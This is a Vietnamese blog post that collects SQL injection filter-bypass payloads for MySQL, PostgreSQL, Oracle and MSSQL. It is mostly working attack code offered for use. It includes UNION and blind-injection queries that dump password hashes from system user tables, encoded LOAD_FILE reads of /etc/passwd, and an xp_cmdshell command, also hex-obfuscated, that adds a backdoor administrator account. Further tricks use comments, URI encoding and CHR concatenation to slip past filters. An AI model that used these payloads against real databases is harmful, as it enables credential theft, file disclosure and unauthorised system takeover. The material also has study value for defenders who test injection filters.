Chủ Nhật, 22 tháng 12, 2013

Advanced - Bypass SQL injection

Ví dụ : Code: "SELECT name, surname FROM users WHERE name='" . $_GET['name'] . "'" Ta có thể by pass bằng back-end DBMS Code: SELECT name, surname FROM users WHERE name='foobar\' OR 10>4--' Exploit với câu lệnh Union Code: SELECT name, surname FROM users WHERE name='foobar\' UNION ALL SELECT NAME, PASSWORD FROM SYS.USER$--' Boolean-based blind SQL injection exploit Code: SELECT name, surname FROM users WHERE name='foobar\' OR ASCII(SUBSTR((SQL query), Nth SQL query output char, 1)) > Bisection algorithm number--' By pass qua lênh load_file Code: LOAD_FILE('/etc/passwd') biến đổi như sau Code: LOAD_FILE(CHAR(47,101,116,99,47,112,97, 115,115,119,100)) hoặc Code: LOAD_FILE(0x2f6574632f706173737764) Trong các web asp ta có thể dùng phương pháp back-end DBMS vd: Code: SELECT pg_sleep(3) thành Code: S%ELEC%T %p%g_sle%ep(%3) Bypass bằng phương pháp hex đối với MSSQL vd: Code: exec master..xp_cmdshell 'NET USER myuser mypass /ADD & NET LOCALGROUP Administrators myuser /ADD' thành Code: DECLARE @rand varchar(8000) SET @rand = 0x65786563206d61737465722e2e78705f636d6473 68656c6c20274e45542055534552206d7975736572 206d7970617373202f4144442026204e4554204c4f 43414c47524f55502041646d696e6973747261746f 7273206d7975736572202f41444427; EXEC (@rand) ByPass bằng các dấu comment trong mysql vd : Code: SELECT user, password FROM mysql.user thành Code: SELECT/*R_aNd*/user/*rA.Nd*/,/*Ran|D */password/*r+anD*/FROM/*rAn,D*/mysq l.user Bypass by random URI encoded payload vd:đối với hệ quản trị PostgreSQL Code: SELECT schemaname FROM pg_tables thành Code: %53E%4c%45%43T%20%73%63h%65%6d%61%6e a%6de%20%46%52O%4d%20%70g%5f%74a%62% 6ce%73 Bypass với các câu select đơn vd: Code: SELECT user, password FROM mysql.user thành Code: SELECT GROUP_CONCAT(CONCAT(user, 'RaND', password)) FROM mysql.user hoặc sử dụng unhex(hex(trường cần lấy)) Code: unhex(hex(username)) Bypass với các trường hợp column bị giới hạn vd:đối với Code: SELECT usename, passwd FROM pg_shadow thành Code: UNION ALL SELECT, CHR(109)||CHR(107)||CHR(100)||CHR(83)||CHR (68)||CHR(111)||COALESCE(CAST(usename AS CHARACTER(10000)), CHR(32))||CHR(80)||CHR(121)||CHR(80)||CHR( 121)||CHR(66)||CHR(109)||COALESCE(CAST(pas swd AS CHARACTER(10000)), CHR(32))||CHR(104)||CHR(108)||CHR(74)||CHR (103)||CHR(107)||CHR(90), FROM pg_shadow--

Related Post:



0

0 nhận xét:

Đăng nhận xét

Gunakan Google Chrome Untuk Mendapatkan Tampilan Terbaik Blog Ini ( ^_^ )